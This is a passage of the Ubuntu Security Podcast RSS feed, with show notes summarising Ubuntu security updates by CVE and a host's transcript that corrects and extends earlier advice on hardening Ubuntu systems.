as a part of the service&rsquo;s architecture as well. Have more than one device
running server software which makes up a part of the entire provided
service, and have those devices communicate with each other through the
network. Different server applications in different devices will isolate
each relevant component and avoid a complete meltdown of the service in
general, in case something is compromised. Divide and conquer. It&rsquo;s like we
don&rsquo;t say this enough.</p>
<p>(2) Close unused ports in your system and disable unnecessary services and
daemons. By not doing so you are only increasing the attack surface for
your system, meaning, you are giving more possibilities for an attacker on
how to attack you. Less is more, and the bare minimum should be enough. Be
sure new installs and new updates don&rsquo;t open up ports you don&rsquo;t want to be
opened and don&rsquo;t bring in new files, scripts or executables that might
compromise you. Keep a continuous eye on everything that is running in the
background. Just because you can&rsquo;t see it, it does not mean it can&rsquo;t be
hacked.</p>
<p>(3) Check your file permissions and change them if necessary! Defaults were
made to be overwritten and you don&rsquo;t need 777 files lying around in your
system anymore, do you? Know your resources and set permissions
accordingly. Correctly setting up users and groups is implied here,
especially considering that users and groups will define who can and can&rsquo;t
access a file in the system. Plus, disable the setuid and the setgid bit
for executables that don&rsquo;t need it. When researching for privilege
escalation techniques in Linux, &ldquo;Find setuid binaries in the system&rdquo; is the
first technique to show up, so that should be enough of a warning to you
that an executable should only be allowed to run as another user in case it
is extremely&hellip;and let me say that again with emphasis: EXTREMELY
necessary, or else, it might just be another day, another root shell for
some random attacker.</p>
<p>(4) Install some third party software to help you keep your system
safe. &ldquo;We are all in this together&rdquo;, a quote from a song in a teen musical
I am totally not ashamed to admit I watched too much when I was a bit
younger, used to say, and that applies for the cyber security
community. Software that can help you better the security in your devices
is plenty out there, and here, today, I will mention a few of them that you
can check out and possibly use in order to harden your Ubuntu OS even
more. Obviously, since this is a summary, we are doing this the fast way,
so let&rsquo;s get listing: Fail2ban, Snort and Suricata for intrusion detection
and prevention; the Google PAM package, which allows implementation of
2-factor-authentication for your Ubuntu users; ClamAV, for malware
detection; the Mozilla TLS configuration generator, to help you securely
generate configuration files for well known applications; and finally,
AppArmor, or possibly SELinux, for Mandatory Access Control that will
complement the Discretionary Access Control you already set up with your
file permissions earlier.</p>
<p>To finish this all off, don&rsquo;t forget to keep your packages up-to-date, to
use shred instead of remove to get rid of files containing sensitive data
in your system, and to continuously go back and reconsider all of the
previously mentioned points, so that your system can securely keep up with
changes that are being made around it. The world won&rsquo;t stop spinning and
technology won&rsquo;t stop evolving, so your server cannot afford to not be
maintained and updated on a regular basis, or else, all of your initial
hardening will be for naught.</p>
<p>That is all for today friends, and I hope you enjoyed it. It was a quick
one, but it was an episode made with love. Feel free to share your thoughts
on any of our social media platforms and for now I bid you farewell and
until next time! Bye!</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E156.mp3" length="17839745" type="audio/mpeg" /><itunes:duration>1587</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 155
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-155/</link>
          <pubDate>Fri, 01 Apr 2022 15:36:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>6713955fb738b9b7224fb441e9fe53b27964470ff1fbda408c61f88cc122417e4d1e7f2613e51c5a9e684c107a14cbc3411ae51639c3e480e81f4760baf8ac60</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 155</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's an off-by-one error in the podcast this week as we bring you part 4 of
  Camila's 3-part Ubuntu hardening series, plus we look at security updates
  for Thunderbird, OpenVPN, Python, Paramiko and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's an off-by-one error in the podcast this week as we bring you part 4 of
  Camila's 3-part Ubuntu hardening series, plus we look at security updates
  for Thunderbird, OpenVPN, Python, Paramiko and more.
  </itunes:summary>
        <description>  It's an off-by-one error in the podcast this week as we bring you part 4 of
  Camila's 3-part Ubuntu hardening series, plus we look at security updates
  for Thunderbird, OpenVPN, Python, Paramiko and more.
  </description>
        <googleplay:description>  It's an off-by-one error in the podcast this week as we bring you part 4 of
  Camila's 3-part Ubuntu hardening series, plus we look at security updates
  for Thunderbird, OpenVPN, Python, Paramiko and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s an off-by-one error in the podcast this week as we bring you part 4 of
Camila&rsquo;s 3-part Ubuntu hardening series, plus we look at security updates
for Thunderbird, OpenVPN, Python, Paramiko and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>47 unique CVEs addressed</p>
<h3 id="usn-5345-1-thunderbird-vulnerabilities-00-45">[<a href="https://ubuntu.com/security/notices/USN-5345-1">USN-5345-1</a>] Thunderbird vulnerabilities [00:45]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0566">CVE-2022-0566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26387">CVE-2022-26387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26386">CVE-2022-26386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22756">CVE-2022-22756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22754">CVE-2022-22754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26384">CVE-2022-26384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26383">CVE-2022-26383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26381">CVE-2022-26381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22764">CVE-2022-22764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22763">CVE-2022-22763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22761">CVE-2022-22761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22760">CVE-2022-22760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22759">CVE-2022-22759</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>91.7.0</li>
<li>Long wait times for TB updates raised as an issue in <a href="https://discourse.ubuntu.com/t/slow-thunderbird-updates-endanger-users/26963/">Ubuntu Discourse</a></li>
</ul>
<h3 id="usn-5346-1-linux-kernel--oem--vulnerability-01-21">[<a href="https://ubuntu.com/security/notices/USN-5346-1">USN-5346-1</a>] Linux kernel (OEM) vulnerability [01:21]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0742">CVE-2022-0742</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ICMPv6 memory leak - DoS via remote unauthenticated user</li>
</ul>
<h3 id="usn-5353-1-linux-kernel--oem--vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5353-1">USN-5353-1</a>] Linux kernel (OEM) vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27666">CVE-2022-27666</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow in IPsec when doing ESP transformations - not
remotely triggerable, requires local user -&gt; DoS/privesc</li>
</ul>
<h3 id="usn-5347-1-openvpn-vulnerability-02-00">[<a href="https://ubuntu.com/security/notices/USN-5347-1">USN-5347-1</a>] OpenVPN vulnerability [02:00]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0547">CVE-2022-0547</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible authentication bypass through only partially correct credentials
due to use of multiple plugins which do deferred authentication - updated
to only allow one plugin to do deferred auth</li>
</ul>
<h3 id="usn-5321-3-firefox-regressions-02-42">[<a href="https://ubuntu.com/security/notices/USN-5321-3">USN-5321-3</a>] Firefox regressions [02:42]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26387">CVE-2022-26387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26385">CVE-2022-26385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26384">CVE-2022-26384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26383">CVE-2022-26383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26382">CVE-2022-26382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26381">CVE-2022-26381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0843">CVE-2022-0843</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>98.0.2</li>
</ul>
<h3 id="usn-5342-1-python-vulnerabilities-02-54">[<a href="https://ubuntu.com/security/notices/USN-5342-1">USN-5342-1</a>] Python vulnerabilities [02:54]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0391">CVE-2022-0391</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4189">CVE-2021-4189</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3426">CVE-2021-3426</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>pydoc server could disclose other files - shouldn&rsquo;t be exposed to
untrusted users</li>
<li>Mishandling of FTP requests (could be tricked into connecting to wrong
server)</li>
<li><code>urllib.parse</code> mishandled URLs with embedded newlines - possible to bypass
regular checks leading to possible URL/request injection etc</li>
</ul>
<h3 id="usn-5348-1-smarty-vulnerabilities-03-42">[<a href="https://ubuntu.com/security/notices/USN-5348-1">USN-5348-1</a>] Smarty vulnerabilities [03:42]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29454">CVE-2021-29454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26120">CVE-2021-26120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-26119">CVE-2021-26119</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21408">CVE-2021-21408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16831">CVE-2018-16831</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13982">CVE-2018-13982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>PHP templating engine</li>
<li>Failed to validate paths in templates - attacker controlled template
could then get arbitrary file read</li>
<li>Various code execution vulns affecting applications that use Smarty</li>
</ul>
<h3 id="usn-5349-1-gnu-binutils-vulnerability-04-17">[<a href="https://ubuntu.com/security/notices/USN-5349-1">USN-5349-1</a>] GNU binutils vulnerability [04:17]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1010204">CVE-2019-1010204</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>gold linker - not the default linker in Ubuntu (would have to specify it
manually via <code>-fuse-ld=gold</code> to gcc)</li>
<li>OOB read when handling a crafted ELF file</li>
</ul>
<h3 id="usn-5352-1-libtasn1-vulnerability-04-42">[<a href="https://ubuntu.com/security/notices/USN-5352-1">USN-5352-1</a>] Libtasn1 vulnerability [04:42]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000654">CVE-2018-1000654</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>CPU based DoS on crafted ASN.1 input</li>
</ul>
<h3 id="usn-5351-1-usn-5351-2-paramiko-vulnerability-05-11">[<a href="https://ubuntu.com/security/notices/USN-5351-1">USN-5351-1</a>, <a href="https://ubuntu.com/security/notices/USN-5351-2">USN-5351-2</a>] Paramiko vulnerability [05:11]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24302">CVE-2022-24302</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Race condition between creating a then setting permissions on the private
key file allows a local attacker to possibly read the private key - fixed
to simply create the file with the restricted permissions in the first
place</li>
</ul>
<h3 id="usn-5313-2-openjdk-11-regression-05-55">[<a href="https://ubuntu.com/security/notices/USN-5313-2">USN-5313-2</a>] OpenJDK 11 regression [05:55]</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21365">CVE-2022-21365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21366">CVE-2022-21366</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21360">CVE-2022-21360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21341">CVE-2022-21341</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21340">CVE-2022-21340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21305">CVE-2022-21305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21299">CVE-2022-21299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21296">CVE-2022-21296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21294">CVE-2022-21294</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21293">CVE-2022-21293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21291">CVE-2022-21291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21283">CVE-2022-21283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21282">CVE-2022-21282</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21277">CVE-2022-21277</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21248">CVE-2022-21248</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OpenJDK 11 specific regression in handling of HTTP/2 - upstream -
11.0.14.1</li>
</ul>
<h3 id="usn-5350-1-chromium-vulnerability-06-17">[<a href="https://ubuntu.com/security/notices/USN-5350-1">USN-5350-1</a>] Chromium vulnerability [06:17]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1096">CVE-2022-1096</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Thanks to Olivier Tilloy (oSoMoN) from Desktop team</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="camila-discusses-ubuntu-hardening--part-4-follow-up--06-43">Camila discusses Ubuntu hardening (part 4 / follow-up) [06:43]</h3>
<ul>
<li>Follow-up to the previous 3 part series on Ubuntu hardening (<a href="https://ubuntusecuritypodcast.org/episode-154/">Episode 154</a>,
<a href="https://ubuntusecuritypodcast.org/episode-153/">Episode 153</a>, <a href="https://ubuntusecuritypodcast.org/episode-152/">Episode 152</a>)</li>
<li>Minor improvements and corrections to the various tips presented over the
past few episodes</li>
</ul>
<h4 id="transcript">Transcript</h4>
<p>Hello listener! Welcome back to our Ubuntu hardening journey in the Ubuntu
Security Podcast. Hey! I know what you&rsquo;re thinking: I can&rsquo;t count. I said
this would be a three part series&hellip;and well&hellip;here I am in a fourth
episode talking about this again. You could also be thinking &ldquo;Hey, you&rsquo;ve
got the wrong title there&hellip;what&rsquo;s the new topic for this episode?&rdquo;, and
should this be any other situation, I might&rsquo;ve said you are right to either
one of these two assumptions because I can be a bit of a scatterbrain
sometimes. But not this time! I am here today once again talking about
Ubuntu hardening because, hey&hellip;cyber security is a continuous
effort. Remember that? And you know what also is a continuous effort?
Learning and becoming wiser, and in our journey to do so, it is very likely
that we will make a few mistakes here and there, myself included. Ok, ok,
I&rsquo;ll stop rambling and saying pretty words to distract you from the real
deal here: I might&rsquo;ve made some mistakes&hellip;Ooops! I apologize. Because yes,
I do know about cyber security, but I am definitely not the master of all
when it comes to it. So, in the past three episodes there were some
sentences here and there that might have been a little bit incorrect, and
some other sentences that might have been forgotten to be said. BUT WORRY
NOT! I am here today to fix this. I got a review on my script for the last
three episodes made by another one of the security team members, and they
gave me a lot of helpful feedback on what I said and on what I suggested to
you all. Since I had already recorded the other episodes and my laziness
spoke a little higher than my willingness to spend the day re-editing audio
files, I decided to instead bring a new episode to you. Coincidentally,
recording a part 4 to a previously established 3 part series really
resonates with the vibe that is the hardening process of an operating
system: we want to always review our work, and fix mistakes whenever
possible. Maintain and evolve, even if we do hit a few bumps on the road
and make some mistakes along the way. We are human after all, and even if
the computer isn&rsquo;t, all that it does is do what we ask of it, so&hellip;yeah!
Enough introductions, let&rsquo;s move on to the meat and potatoes of this
episode and right some wrongs! Oh&hellip;actually&hellip;I don&rsquo;t think it is really
necessary to mention this&hellip;but there is always that one person, so: listen
to the other episodes if you haven&rsquo;t yet. I can&rsquo;t really fix something that
you don&rsquo;t even know is broken.</p>
<p>Ok, point number one that was brought to my attention: remember when we
were talking about the swap partition in part 1? Well, it is a valid
solution for all the reasons that I mentioned there, but it is not the only
one. Drumroll please, as I introduce you all, if you don&rsquo;t already know it,
to the swap file. TADA! The swap file, as the name suggests, is a file in
your system that will serve the same purpose as a swap partition. However,
instead of being configured as a separate partition of your disk, a swap
file is created under the root partition in your system and you simply
nudge the OS to remind it that that specific file should be used as swap
whenever necessary. Neat, right? Specially because resizing swap files is a
lot easier than resizing an entire swap partition. A LOT easier. Using
command &lsquo;fallocate&rsquo; or command &lsquo;dd &lsquo;will help you get a swap file ready in
case you wish to use this method of swapping instead of creating an entire
new partition during install, or in case you forgot about it during
install. Use the &lsquo;mkswap&rsquo; tool to tell Ubuntu that the new file is a swap
space and enable the swap file with &lsquo;swapon&rsquo;. To finish it off, and make
changes permanent, add information on the swapfile to &lsquo;fstab&rsquo;. Remember to
correctly set permissions in this swap file, as, even though it is a swap
entity, it is still a file. Only the root user should be able to write to
that file or read from it, so get your &lsquo;chmod 600&rsquo; ready for that. The
conclusion here is: both a swap partition and a swap file will serve the
same purpose, and they are both located on disk, so not much to compare on
that front. However, if you are looking for something more flexible,
stretchy, if you will, consider using the swap file. It will help you out
with your maintainability needs, and with adjusting to changes in the
future, especially if these changes involve increasing the size of the
swap, or decreasing it due to hardware changes applied to your device, or
any other type of related changes. I do stress though, hopefully enough
that you are just being reminded of this here: do this if it suits YOUR
needs. Maybe you already have a swap partition, and it is ok to you for it
to have an immutable size until the end of eternity, and that is great! You
do you. What is important for you to takeaway here is that I am giving you
another option, one that might better suit your needs, or not, but I am not
the one to decide that for you.</p>
<p>Next up, let&rsquo;s talk about that &lsquo;hidepid=2&rsquo; suggestion I made in part 2,
shall we? This suggestion came up when we were talking about fstab, and I
was telling you about ways to protect your /proc directory from the prying
eyes of possibly malicious users. Well, it unfortunately doesn&rsquo;t work when
you have systemd installed, which is the case for Ubuntu. Whewhe. So yes,
blame me for relaying possibly incorrect information to you. I am deeply
sorry&hellip;but please don&rsquo;t cancel me for it. There are a few bug threads that
mention this error and a lot of proposed solutions given by the community
can be found in the various comments. I will not go into too much detail on
those here because it might be a bit difficult to get the actual solution
through without any visual aid, but I do encourage you to do some research
on this, and maybe apply one of the suggested alternatives should it be
adequate for your system. Sorry once again for giving you a hardening tip
that would cause an error in your system, but hopefully the solutions out
there will allow you to get right what I initially got wrong. I&rsquo;ll try to
get some links containing some of these solutions added to the podcast
notes in order to help you out, and in order to atone for my mistakes. I&rsquo;m
sorry, I&rsquo;m sorry once again. Ok, I&rsquo;ll stop now.</p>
<p>Point number three: I told you to love your logs and embrace your logs
during part 2 of this series. The computer pours out its innermost secrets
to you and you decide to ignore it? Well&hellip;I kind of ignored it a little
bit as well, because I talked so much about &lsquo;syslog&rsquo; and all of its log
files that I forgot about another oh so very important member of the
logging squad: &lsquo;journald&rsquo;. If your Linux system has &lsquo;systemd&rsquo;, it does have
&lsquo;journald&rsquo;, and therefore, if you are using Ubuntu, you most likely have it
too. Since &lsquo;journald&rsquo; stores data in binary format, the usual way of
accessing the data it collects is not recommended here, as our brains have
still not yet evolved to immediately read and process unreadable characters
when looking at a sequence of those characters. There are no plain text log
files here. Instead, if you want to check out all of the logging goodness
that &lsquo;journald&rsquo; can provide, and expose all of your device&rsquo;s secrets, you
have to use the &lsquo;journalctl&rsquo; utility. I am pretty sure this name is
familiar to you, as most times when you have a service issue in Ubuntu or a
system issue in general, it recommends you check out the output of
&lsquo;journald&rsquo; by typing in a shell &lsquo;journalctl -x&rsquo;. &lsquo;Journald&rsquo; is a very
interesting logging tool and it can allow you to troubleshoot your system
very efficiently. It tracks each log to a specific system boot, for
example, and this means that you can check logs considering only data
connected to a specific boot instance when using the &lsquo;-b&rsquo; option. So, if
you have a situation where you know that the issue happened the last time
you turned on your computer, instead of checking all of the log, you can
narrow it down and try to find your problem in fewer lines of log data
instead. You can also filter log data based on a time range, based on a
specific service, based on a specific user or based on message priority
level. Which one is better to use between &lsquo;syslog&rsquo; and &lsquo;journald&rsquo;, you ask?
It depends on your needs. Advantages of using &lsquo;journald&rsquo; include the fact
that it structures data in such a way that searches can be optimized, plus,
it indexes data, meaning that lookup operations of the log files will
happen in a much faster manner than they would when searching for
information in plain text files. Filtering is also easier with &lsquo;journald&rsquo;,
as seen by all of the options I mentioned previously that you can use
together with &lsquo;journalctl&rsquo;. With &lsquo;syslog&rsquo; and all its different plain text
log files, it might be a little bit more difficult or troublesome to find
exactly what you are looking for, and even correlate log information
without having a third party software to maybe assist you with this
job. When searching through &lsquo;syslog&rsquo; logs we usually end up using &lsquo;grep&rsquo;,
our handy-dandy text file search tool, but unfortunately, &lsquo;grep&rsquo; will not
take into account the context of a situation. So, when searching through
&lsquo;syslog&rsquo; logs, instead of a simple one line command you would type if using
&lsquo;journalctl&rsquo;, you create a huge multiline beast with a lot of pipes to get
a coherent and valuable result out of the many &lsquo;syslog&rsquo; files you wish to
have analyzed. Another advantage of &lsquo;journald&rsquo; is that &lsquo;journald&rsquo; has
permissions associated to its log files, so every user is able to see their
own log without actually being able to see output that would be exclusive
only to root, for example, said users needing to prove their privileged
identity before accessing this other sensitive data about the
system. Therefore, regular users are able to troubleshoot using &lsquo;journald&rsquo;
logs, but at the same time, information that should not be exposed to
regular users for one reason or another is protected. With &lsquo;syslog&rsquo; it will
all depend on permissions associated to the log text files, and these will
include ALL of the information for one specific log source, so it won&rsquo;t be
every random user that will have the opportunity to possibly use log data
to solve their issues, unless you allow said random user to actually read
logs in their entirety. Talking a bit about possible disadvantages related
to &lsquo;journald&rsquo;: &lsquo;journald&rsquo; does not include a well-defined remote logging
implementation and, therefore, is not the best option to consider when you
need to build a central logging server, whereas &lsquo;syslog&rsquo; allows that to
happen very well, since there is even a same name protocol which is used to
send messages to a main log server running a &lsquo;syslog&rsquo; instance. Plus,
&lsquo;journald&rsquo; considers only information of Linux systems, while &lsquo;syslog&rsquo;
encopasses more, such as logs generated by firewall devices and
routers. This means that correlation between the logs of the different
devices in your infrastructure might be made more efficient when you indeed
have a centralized &lsquo;syslog&rsquo; server to gather all of that information,
especially considering that it is possible to send &lsquo;journald&rsquo; data to an
already existing &lsquo;syslog&rsquo; implementation, as &lsquo;journald&rsquo; retains full
&lsquo;syslog&rsquo; compatibility. One of the issues we find with this though, is that
most advantages that come with &lsquo;journald&rsquo; are lost when such messages are
sent to the centralized &lsquo;syslog&rsquo; server, as this server, as the name
implies, will include a &lsquo;syslog&rsquo; implementation instead of a &lsquo;journald&rsquo;
one, this &lsquo;syslog&rsquo; implementation recovering, storing and processing
messages as a regular &lsquo;syslog&rsquo; instance would…so, no indexing and no
optimized data reading and filtering. The other possible issue is that
&lsquo;journald&rsquo; needs to send its data to a local &lsquo;syslog&rsquo; server, and this
server will then send that data to the remote one.  Having two tools doing
the same logging work might not be the most ideal thing for you or your
infrastructure, so do take that into account when setting up your logs and
your whole logging system. For this reason and the other reasons mentioned
we have that &lsquo;journald&rsquo; ends up being more &ldquo;host-based&rdquo; than
&lsquo;syslog&rsquo;. Therefore, I once again ask the question: which one is better to
use? Maybe it&rsquo;s &lsquo;journald&rsquo; in case you have one host only, maybe it&rsquo;s
&lsquo;syslog&rsquo; if you have an entire infrastructure and a centralized log server
with third party software that processes all information it gets, or maybe
it’s even both, since, as we already discussed in previous episodes, an
extra layer of protection is what will help you build up your cyber
security walls of defense more efficiently, especially when you consider
that you already have &lsquo;journald&rsquo; installed by default in your system.</p>
<p>Going on to point number four: when installing tools such as Rootkit
Hunter, be aware of possible false positives. It is always useful to have
tools that scan your system for you, and point you towards the direction
issues might be, however, it is interesting to confirm that the issue
database used by such programs is updated and well matched to your system
in order for results to be actually useful. So keep two things in mind:
that tools such as Rootkit Hunter exist and can be very helpful, and that,
even though they can be helpful, they can also not be if they are
out-of-date and just end up flooding you with false positives that will
then lead you on a wild goose chase that generates nothing of value to you
or your system. Also, do be careful about installing programs such as
vulnerability scanners that can be later on used by attackers themselves to
find flaws in your system. If you&rsquo;ve used it and no longer need it
installed, maybe remove it until it is once again necessary&hellip;after all,
even security tools increase the attack surface of your system, and they
themselves might have vulnerabilities related to them that could be
exploited by someone with enough knowledge of it. Finally - and me saying
this might sound unnecessary because it should be obvious, but I do say it
because there is always that someone out there&hellip;right? - don&rsquo;t think that
a scan performed by ONE single scanning tool is enough to guarantee
security of a device, especially when we consider tools that do need to
rely on previously known hashes, or rules, or sets of steps, in order to
identify a possibly malicious entity in a system. That is because attackers
are always trying to circumvent these tools by using digital fake
mustaches, and, sometimes, these disguises are enough, as is a certain
superhero&rsquo;s glasses. I mean&hellip;how can people not know they are the same
person? Unfortunately, this major oversight might happen sometimes with
your security tools as well, so knowing this is key in order to actually
build a truly secure system. By knowing, you also know that said tools
should only be a part of a bigger, LAYERED strategy you use to harden your
system. Agreed?</p>
<p>Time to dive into point number five. I was asked a question: is &lsquo;ping&rsquo;
still &lsquo;setuid&rsquo; root? And the answer is actually “no”. Oh, well! Remember
when we were talking about the dangers of the &lsquo;setuid&rsquo; binaries and I used
&lsquo;ping&rsquo; as an example to show the issues that might arrive when you set that
sneaky permission bit to 1? Well, it turns out that my example was a little
bit outdated, since &lsquo;setuid ping&rsquo; was already put in the WANTED list for
&ldquo;causing too many security issues&rdquo; and was therefore demoted to
non-&lsquo;setuid&rsquo; status. So, if you are using Ubuntu 20.04 LTS, for example,
you can run an &rsquo;ls -la /usr/bin/ping&rsquo; and you will see permissions set to
755 instead of 4755. How is the privileged socket access performed in this
case? Ah&hellip;well, that might be a discussion for a future podcast episode,
especially since a little bird told me that the solution for that might
have caused an even bigger issue than the &lsquo;setuid&rsquo; bit when changes to
remove it were initially being made. For now, I&rsquo;ll just leave you to wonder
a little bit more about this, and reinforce that, even if &lsquo;ping&rsquo; is no
longer &lsquo;setuid&rsquo;, the example stands to show the dangers of having this bit
set, be it &lsquo;ping&rsquo;, be it any other executable in your system that might
allow for malicious tampering. Consider the &lsquo;ping&rsquo; example a template of
what COULD happen should you decide to maybe set its &lsquo;setuid&rsquo; bit. Don&rsquo;t
actually do that though, please.</p>
<p>Point number six is as simple as: &rsquo;netstat&rsquo; has been replaced with &lsquo;ss&rsquo;. I
mentioned using &rsquo;netstat&rsquo; to check open ports in your system because that
is what I have been using since forever. Old habits die hard, I guess&hellip;and
that, my friends, is definitely something I shouldn&rsquo;t be saying here,
because old habits will also compromise you, since it is always important
to keep up-to-date with recent software if you plan on being secure. So
yes, forgive me for I have been a hypocrite. Information on &rsquo;netstat&rsquo; being
deprecated is even in the &lsquo;man&rsquo; page for netstat. Oof&hellip;hurts to see my own
mistakes. Read your manuals people, their existence is not trivial. But,
you know what? You live and you learn. I know better now, and you do
too. So let&rsquo;s be better together, friends, and use &lsquo;ss&rsquo; instead of the
obsolete &rsquo;netstat&rsquo; to find open ports in our system that are open for
absolutely no reason! The good thing to come out of this mistake is that we
get to once again remember the importance of updating and maintaining
systems in order to actually keep them secure, and this also includes the
system that is our own minds.</p>
